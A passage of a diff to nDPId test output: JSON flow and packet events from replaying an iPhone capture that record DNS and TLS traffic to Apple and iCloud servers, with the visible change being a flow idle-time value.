98-fmfmobile.icloud.com,p66-fmfmobile.icloud.com,p15-fmfmobile.icloud.com,p16-fmfmobile.icloud.com,p44-fmfmobile.icloud.com,p04-fmfmobile.icloud.com,p09-fmfmobile.icloud.com,p23-fmfmobile.icloud.com,p61-fmfmobile.icloud.com,p30-fmfmobile.icloud.com,p46-fmfmobile.icloud.com,p60-fmfmobile.icloud.com,p43-fmfmobile.icloud.com,p57-fmfmobile.icloud.com,p14-fmfmobile.icloud.com,p03-fmfmobile.icloud.com,p36-fmfmobile.icloud.com,p64-fmfmobile.icloud.com,p28-fmfmobile.icloud.com,p24-fmfmobile.icloud.com,p202-fmfmobile.icloud.com,p01-fmfmobile.icloud.com,p62-fmfmobile.icloud.com,p47-fmfmobile.icloud.com,p35-fmfmobile.icloud.com,p65-fmfmobile.icloud.com,p31-fmfmobile.icloud.com,p63-fmfmobile.icloud.com,p19-fmfmobile.icloud.com,p33-fmfmobile.icloud.com,p51-fmfmobile.icloud.com,p54-fmfmobile.icloud.com,p59-fmfmobile.icloud.com,p201-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=fmfmobile.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"FF:C3:9F:1A:A1:3C:D2:3C:06:96:EC:49:B4:97:A9:D3:DA:05:A3:E2"}}
00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1582454598582,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":244,"pkt_l4_len":210,"thread_ts_msec":1582454598582,"pkt":"xGGLNYKpxiwDYGpkCABFAADmpdwAAEARTsjAqAIBwKgCEQA1znQA0sdAsQ+BgAABAAkAAAAAB2dhdGV3YXkGaWNsb3VkA2NvbQAAAQABwAwABQABAAARlgAaB2dhdGV3YXkCZmUJYXBwbGUtZG5zA25ldADAMAABAAEAAAAiAAQR+LBLwDAAAQABAAAAIgAEEfixhcAwAAEAAQAAACIABBH4sCjAMAABAAEAAAAiAAQR+LCNwDAAAQABAAAAIgAEEfiwTcAwAAEAAQAAACIABBH4sWXAMAABAAEAAAAiAAQR+LGqwDAAAQABAAAAIgAEEfiwiQ=="}
00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":110,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598542,"flow_last_seen":1582454598582,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454598582,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"gateway.icloud.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.248.176.75"}}
00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598418,"flow_last_seen":1582454598584,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598584,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598587,"flow_last_seen":1582454598587,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598587,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1582454598587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598587,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGtbvAqAIREfiwS8WUAbuGKOrDAAAAALDC\/\/9\/HgAAAgQFtAEDAwcBAQgKEd\/oBAAAAAAEAgAA"}
00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":124,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598416,"flow_last_seen":1582454598590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598590,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598385,"flow_last_seen":1582454598592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598592,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"4ef1b297bb817d8212165a86308bac5f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
01251{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":130,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454598385,"flow_last_seen":1582454598592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4123,"flow_avg_l4_payload_len":515,"midstream":0,"thread_ts_msec":1582454598592,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","server_names":"*.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"4ef1b297bb817d8212165a86308bac5f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=*.ls.apple.com, OU=management:idms.group.576486, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"E4:85:25:4C:99:F8:FB:66:49:4B:80:64:5E:63:2A:75:9B:8F:C3:51"}}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1582454598621,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598621,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAC4GB8AR+LBLwKgCEQG7xZQAd9VghijqxKBScSDqGQAAAgQFrAEBCApbEwd4Ed\/oBAEDAwU="}
00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598418,"flow_last_seen":1582454598584,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598584,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598587,"flow_last_seen":1582454598587,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598587,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1582454598587,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598587,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGtbvAqAIREfiwS8WUAbuGKOrDAAAAALDC\/\/9\/HgAAAgQFtAEDAwcBAQgKEd\/oBAAAAAAEAgAA"}
00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":124,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598416,"flow_last_seen":1582454598590,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598590,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598385,"flow_last_seen":1582454598592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598592,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"4ef1b297bb817d8212165a86308bac5f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
01251{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":130,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454598385,"flow_last_seen":1582454598592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4123,"flow_avg_l4_payload_len":515,"midstream":0,"thread_ts_msec":1582454598592,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","server_names":"*.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"4ef1b297bb817d8212165a86308bac5f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=*.ls.apple.com, OU=management:idms.group.576486, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"E4:85:25:4C:99:F8:FB:66:49:4B:80:64:5E:63:2A:75:9B:8F:C3:51"}}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1582454598621,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598621,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAC4GB8AR+LBLwKgCEQG7xZQAd9VghijqxKBScSDqGQAAAgQFrAEBCApbEwd4Ed\/oBAEDAwU="}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAAA8BIgAAP8RMcbAqAIRwKgCAc3KADUAKGCiwekBAAABAAAAAAAAA3d3dwZpY2xvdWQDY29tAAABAAE="}
00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"www.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -158,10 +158,10 @@
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAABD04UAAP8RYsHAqAIRwKgCAcLYADUAL8OecEkBAAABAAAAAAAABGluaXQGaXR1bmVzBWFwcGxlA2NvbQAAAQAB"}
00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"init.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598721,"flow_last_seen":1582454598721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598721,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1582454598721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598721,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGrK\/AqAIREfi5V8WVAbuoGt7oAAAAALDC\/\/9fVwAAAgQFtAEDAwcBAQgKEd\/opwAAAAAEAgAA"}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1582454598723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598723,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGtcfAqAIREfiwS8WUAbuGKOrEAHfVYYAQBAuCrAAAAQEIChHf6IhbEwd4"}
00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598587,"flow_last_seen":1582454598723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598723,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598721,"flow_last_seen":1582454598721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598721,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1582454598721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598721,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGrK\/AqAIREfi5V8WVAbuoGt7oAAAAALDC\/\/9fVwAAAgQFtAEDAwcBAQgKEd\/opwAAAAAEAgAA"}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1582454598723,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598723,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGtcfAqAIREfiwS8WUAbuGKOrEAHfVYYAQBAuCrAAAAQEIChHf6IhbEwd4"}
00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598587,"flow_last_seen":1582454598723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598723,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00652{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1582454598755,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1582454598755,"pkt":"xGGLNYKpxiwDYGpkCABFAAC9YWUAAEARk2jAqAIBwKgCEQA1zcoAqUkOwemBgAABAAQAAAAAA3d3dwZpY2xvdWQDY29tAAABAAHADAAFAAEAAAfiAB8Hd3d3LWNkbgZpY2xvdWQDY29tBmFrYWRucwNuZXQAwCwABQABAAAAjwAZA3d3dwZpY2xvdWQDY29tB2VkZ2VrZXnARsBXAAUAAQAAEZYAFQVlNDQ3OAFhCmFrYW1haWVkZ2XARsB8AAEAAQAAABgABBctSi4="}
00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":172,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598755,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1582454598755,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"www.icloud.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.45.74.46"}}
00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1582454598756,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":1582454598756,"pkt":"xGGLNYKpxiwDYGpkCABFAADSfP0AAEARd7vAqAIBwKgCEQA10EUAvrFqiY6BgAABAAQAAAAACWlwaG9uZS1sZAVhcHBsZQNjb20AAAEAAcAMAAUAAQAACaQAJwlpcGhvbmUtbGQMb3JpZ2luLWFwcGxlA2NvbQZha2FkbnMDbmV0AMAxAAUAAQAAAMcAIQxpcGhvbmUtbGQtYXIFYXBwbGUDY29tB2VkZ2VrZXnAU8BkAAUAAQAAEZYAFQVlOTMzOAFkCmFrYW1haWVkZ2XAU8CRAAEAAQAAAA8ABFx6\/FI="}
@@ -172,36 +172,36 @@
